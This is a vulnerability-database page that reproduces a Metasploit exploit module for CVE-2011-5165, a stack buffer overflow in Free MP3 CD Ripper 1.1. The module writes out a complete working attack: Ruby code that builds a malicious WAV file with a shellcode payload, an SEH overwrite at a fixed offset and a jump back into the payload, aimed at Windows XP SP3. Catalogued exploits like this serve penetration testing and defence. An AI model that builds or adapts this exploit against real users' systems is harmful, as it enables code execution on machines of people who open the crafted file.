Vulners
Lucene search
Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow
🗓️ 21 Nov 2011 18:39:45Reported by Richard Leahy, X-h4ck, Tiago Henriques, James Fitts <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 26 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow Exploit | 27 Apr 201500:00 | – | zdt |
 | CVE-2011-5165 | 30 Mar 201000:00 | – | circl |
 | Free MP3 CD Ripper WAV File Stack Buffer Overflow (CVE-2011-5165) | 23 Oct 201400:00 | – | checkpoint_advisories |
 | CVE-2011-5165 | 15 Sep 201217:00 | – | cve |
 | CVE-2011-5165 | 15 Sep 201217:00 | – | cvelist |
 | CVE-2011-5165 | 15 Sep 201217:55 | – | nvd |
 | Stack overflow | 15 Sep 201217:55 | – | prion |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Free MP3 CD
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious
WAV file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Richard Leahy', # Initial discovery
'X-h4ck', # msf module is based on his poc
'Tiago Henriques', # msf module
'James Fitts <fitts.james[at]gmail.com>' # clean ups
],
'References' =>
[
[ 'CVE', '2011-5165' ],
[ 'OSVDB', '63349' ],
[ 'EDB', '11975' ], #Initial disclosure
[ 'EDB', '17727' ] #This exploit is based on this poc
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
'Ret' => 0x1001860b, # p/p/r in libFLAC.dll
'Offset' => 4116
}
],
],
'Privileged' => false,
'DisclosureDate' => '2011-08-27',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.wav']),
])
end
def exploit
wav = Metasm::Shellcode.assemble(Metasm::Ia32.new, "inc ecx").encode_string * 100
wav << payload.encoded
wav << rand_text_alpha_upper(target['Offset'] - (100 + payload.encoded.length))
wav << generate_seh_record(target.ret)
wav << Metasm::Shellcode.assemble(Metasm::Ia32.new, "inc ecx").encode_string * 4
wav << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4050").encode_string
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(wav)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
10High risk
Vulners AI Score10
CVSS 29.3
EPSS0.37001